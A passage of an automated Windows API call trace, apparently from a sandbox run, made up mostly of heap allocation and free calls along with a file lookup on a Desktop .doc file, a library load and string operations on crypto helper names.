RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0185.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0185.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0185.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0185.803] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/IqAWqPLMQZePl.doc", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62c72a90, ftCreationTime.dwHighDateTime=0x1d5ef8b, ftLastAccessTime.dwLowDateTime=0x6aceb30, ftLastAccessTime.dwHighDateTime=0x1d5e849, ftLastWriteTime.dwLowDateTime=0x6aceb30, ftLastWriteTime.dwHighDateTime=0x1d5e849, nFileSizeHigh=0x0, nFileSizeLow=0x4323, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="IqAWqPLMQZePl.doc", cAlternateFileName="IQAWQP~1.DOC")) returned 0xa87250 [0185.804] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0185.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0185.805] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0185.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0185.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0185.806] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0185.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0185.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0185.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0185.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.808] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0185.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0185.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0185.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0185.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.813] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0185.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.815] 